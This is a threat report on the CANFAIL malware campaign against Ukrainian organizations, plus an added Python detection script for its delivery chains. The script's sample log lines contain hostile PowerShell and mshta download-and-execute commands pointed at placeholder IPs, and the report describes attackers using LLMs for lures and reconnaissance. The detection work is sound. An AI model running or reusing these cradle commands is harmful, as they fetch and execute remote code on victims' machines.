Russian-Linked Cyber Threat Targets Ukraine with CANFAIL Malware in Defense and Energy Sectors

Emerging Russian-Linked Cyber Threat Targets Ukrainian Organizations with CANFAIL Malware

A newly identified threat actor, assessed as possibly connected to Russian intelligence services, has been tied to a series of attacks on Ukrainian entities using a malware strain dubbed CANFAIL. The Google Threat Intelligence Group (GTIG) has observed the actor targeting the defense, military, and energy sectors and government bodies at both the regional and national level in Ukraine.

Beyond these primary targets, the group has shown an expanding interest in aerospace organizations, manufacturing firms associated with military and drone technologies, nuclear and chemical research institutions, and international bodies involved in conflict monitoring and humanitarian aid in Ukraine.

The actor is less resourced and less sophisticated than other Russian-affiliated groups, but it has recently begun using large language models (LLMs) to support its operations: for reconnaissance, for drafting social-engineering lures, and for technical guidance on post-compromise activity and on building command-and-control (C2) infrastructure.

Recent phishing campaigns orchestrated by this group involve impersonating legitimate Ukrainian energy organizations to gain unauthorized access to both organizational and personal email accounts. They have also masqueraded as a Romanian energy company with Ukrainian clientele, targeting Romanian firms and conducting reconnaissance on Moldovan organizations.

To support these operations, the actor compiles email address lists tailored to specific regions and industries. The lures, frequently LLM-generated, carry Google Drive links that lead to RAR archives containing the CANFAIL malware.

CANFAIL is obfuscated JavaScript delivered under a double extension (for example, .pdf.js) so that the file appears to be a PDF, since Windows hides known extensions by default. When the victim opens it, the script launches PowerShell, which downloads and executes a memory-only PowerShell dropper while a fake error message is displayed to the victim.

GTIG has also linked this actor to a campaign known as PhantomCaptcha, disclosed by SentinelOne's SentinelLABS in October 2025. That campaign targeted organizations associated with Ukraine's war-relief efforts with phishing emails that led recipients to counterfeit pages hosting ClickFix-style instructions (the victim is told to paste a command into a system dialog and run it), which started the infection chain and delivered a WebSocket-based trojan.
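Both delivery chains described above (the CANFAIL .pdf.js lure launching PowerShell from a script host, and the ClickFix-style command pasted into a Run dialog) leave the same kind of trace: a scripting interpreter spawned by an unexpected parent with a download cradle or URL on its command line. The following is an added detection example, not code from GTIG or SentinelLABS. It checks attachment names for document-then-executable double extensions and runs two process-creation rules over constructed, key=value formatted log lines modelled on Sysmon Event ID 1; the hostnames, timestamps and the 203.0.113.x addresses are made up for the example.

```python
"""Detection helpers for the CANFAIL / ClickFix delivery chains.

Added example. The log lines below are constructed to resemble Windows
process-creation events and are not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Script hosts that a double-clicked .js lure runs under.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Parent of a command pasted into the Win+R Run dialog (ClickFix-style).
SHELL_PARENTS = {"explorer.exe"}
CHILD_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download-cradle and memory-only execution markers on a PowerShell command line.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b"
    r"|frombase64string|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Decoy document extensions seen before the real, executable extension.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
EXEC_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "hta", "lnk", "exe", "scr", "bat", "cmd", "ps1"}


def is_double_extension_lure(filename: str) -> bool:
    """True for names like 'contract.pdf.js': decoy document extension, then an executable one."""
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    return parts[1] in DECOY_EXTS and parts[2] in EXEC_EXTS


# key=value pairs; a value may be double-quoted and contain spaces.
EVENT_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


@dataclass
class Alert:
    rule: str
    host: str
    cmd: str


def parse_event(line: str) -> dict:
    """Parse one constructed key=value log line into a dict (quotes stripped)."""
    ev = {}
    for key, val in EVENT_RE.findall(line):
        ev[key] = val[1:-1] if val.startswith('"') else val
    return ev


def classify(ev: dict) -> Optional[str]:
    """Return a rule name if the parent/child/command-line combination is suspicious."""
    parent = ev.get("parent", "").lower()
    image = ev.get("image", "").lower()
    cmd = ev.get("cmd", "")
    if image not in CHILD_INTERPRETERS:
        return None
    # CANFAIL-style: .js under wscript/cscript hands off to a PowerShell download cradle.
    if parent in SCRIPT_HOSTS and CRADLE_RE.search(cmd):
        return "script-host-download-cradle"
    # ClickFix-style: explorer.exe (Run dialog) spawns an interpreter that fetches a URL.
    if parent in SHELL_PARENTS and (CRADLE_RE.search(cmd) or URL_RE.search(cmd)):
        return "clickfix-run-dialog-cradle"
    return None


def scan(lines: List[str]) -> List[Alert]:
    alerts = []
    for line in lines:
        ev = parse_event(line)
        rule = classify(ev)
        if rule:
            alerts.append(Alert(rule, ev.get("host", "?"), ev.get("cmd", "")))
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Benign: user opens PowerShell from the Start menu, no cradle on the command line.
    'ts=2025-10-02T08:10:11Z host=WS01 parent=explorer.exe image=powershell.exe cmd="powershell.exe"',
    # CANFAIL-style: a double-clicked .pdf.js runs under wscript and starts a hidden cradle.
    'ts=2025-10-02T08:14:03Z host=WS01 parent=wscript.exe image=powershell.exe '
    'cmd="powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.5/s\')"',
    # ClickFix-style: command pasted into the Run dialog, so explorer.exe is the parent.
    'ts=2025-10-02T09:02:47Z host=WS02 parent=explorer.exe image=mshta.exe cmd="mshta http://203.0.113.9/p"',
    # Scheduled admin script: parent is not a script host or explorer, so no alert.
    'ts=2025-10-02T09:30:00Z host=SRV01 parent=svchost.exe image=powershell.exe cmd="powershell -File C:\\scripts\\backup.ps1"',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.cmd}")
    print(is_double_extension_lure("Contract_2025.pdf.js"))
```

The script-host rule will also fire on legitimate logon scripts that call PowerShell with a web request, so it needs an allow-list of known script paths before it is used for alerting. The explorer.exe parent is only one way a ClickFix command can run; commands pasted into Windows Terminal or a cmd window have different parents, and the Run dialog history (the RunMRU registry key) is worth checking during triage.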